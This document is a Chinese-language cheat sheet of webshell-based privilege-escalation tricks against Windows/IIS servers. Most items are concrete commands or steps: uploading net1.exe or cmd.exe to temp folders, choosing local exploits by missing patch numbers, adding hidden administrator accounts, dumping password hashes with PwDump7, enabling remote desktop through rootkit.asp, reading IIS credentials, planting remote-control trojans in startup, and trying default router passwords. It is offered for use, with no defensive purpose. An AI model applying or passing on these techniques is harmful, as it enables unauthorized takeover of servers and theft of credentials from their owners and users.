1.能不能執行cmd就看這個命令:net user,net不行就用net1,再不行就上傳一個net到可寫可讀目錄,執行/c c:windowstempcookiesnet1.exe user
2.當提權成功,3389沒開的情況下,上傳開3389的vps沒成功時,試試上傳rootkit.asp 用剛提權的用戶登錄進去就是system權限,再試試一般就可以了。
3.cmd拒絕訪問的話就自己上傳一個cmd.exe 自己上傳的后綴是不限制后綴的,cmd.exe/cmd.com/cmd.txt 都可以。
4.cmd命令:systeminfo,看看有沒有KB952004、KB956572、KB970483這三個補丁,如果沒有,第一個是pr提權,第二個是巴西烤肉提權,第三個是iis6.0提權。
6.c:windowstempcookies 這個目錄
7.找sa密碼或是root密碼,直接利用大馬的文件搜索功能直接搜索,超方便!
8.cmd執行exp沒回顯的解決方法:com路徑那里輸入exp路徑C:RECYCLERpr.exe,命令那里清空(包括/c )輸入”net user jianmei daxia /add”
9.增加用戶並提升為管理員權限之后,如果連接不上3389,上傳rootkit.asp腳本,訪問會提示登錄,用提權成功的賬號密碼登錄進去就可以擁有管理員權限了。
10.有時變態監控不讓添加用戶,可以嘗試抓管理哈希值,上傳“PwDump7 破解當前管理密碼(hash值)”,倆個都上傳,執行PwDump7.exe就可以了,之后到網站去解密即可。
11.有時增加不上用戶,有可能是密碼過於簡單或是過於復雜,還有就是殺軟的攔截,命令 tasklist 查看進程
12.其實星外提權只要一個可執行的文件即可,先運行一遍cmd,之后把星外ee.exe命名為log.csv 就可以執行了。
13.用wt.asp掃出來的目錄,其中紅色的文件可以替換成exp,執行命令時cmd那里輸入替換的文件路徑,下面清空雙引號加增加用戶的命令。
14.提權很無奈的時候,可以試試TV遠控,通殺內外網,穿透防火牆,很強大的。
15.當可讀可寫目錄存在空格的時候,會出現這樣的情況:’Cocuments’ 不是內部或外部命令,也不是可運行的程序 或批處理文件。解決辦法是利用菜刀的交互shell切換到exp路徑,如:Cd Cocuments and SettingsAll UsersApplication DataMicrosoft 目錄
然后再執行exp或者cmd,就不會存在上面的情況了,aspshell一般是無法跳轉目錄的~
16.有時候可以添加用戶,但是添加不到管理組,有可能是administrators改名了,net user administrator 看下本地組成員,*administrators
17.進入服務器,可以繼續內網滲透 這個時候可以嘗試打開路由器 默認帳號密碼 admin admin
18.有的cmd執行很變態,asp馬里,cmd路徑填上面,下面填:”"c:xxxexp.exe “whoami” 記得前面加兩個雙引號,不行后面也兩個,不行就把exp的路徑放在cmd那里,下面不變。
19.一般增加不上用戶,或是想添加增加用戶的vbs,bat,遠控小馬到服務器的啟動項里,用“直接使服務器藍屏重啟的東東”這個工具可以實現,
20.執行PwDump7.exe抓哈希值的時候,建議重定向結果到保存為1.txt /c c:windowstempcookiesPwDump7.exe >1.txt
21.菜刀執行的技巧,上傳cmd到可執行目錄,右擊cmd 虛擬終端,help 然后setp c:windowstempcmd.exe 設置終端路徑為:
c:windowstempcmd.exe
22.當不支持aspx,或是支持但跨不了目錄的時候,可以上傳一個讀iis的vps,執行命令列出所有網站目錄,找到主站的目錄就可以跨過去了。
上傳cscript.exe到可執行目錄,接着上傳iispwd.vbs到網站根目錄,cmd命令/c “c:windowstempcookiescscript.exe” d:webiispwd.vbs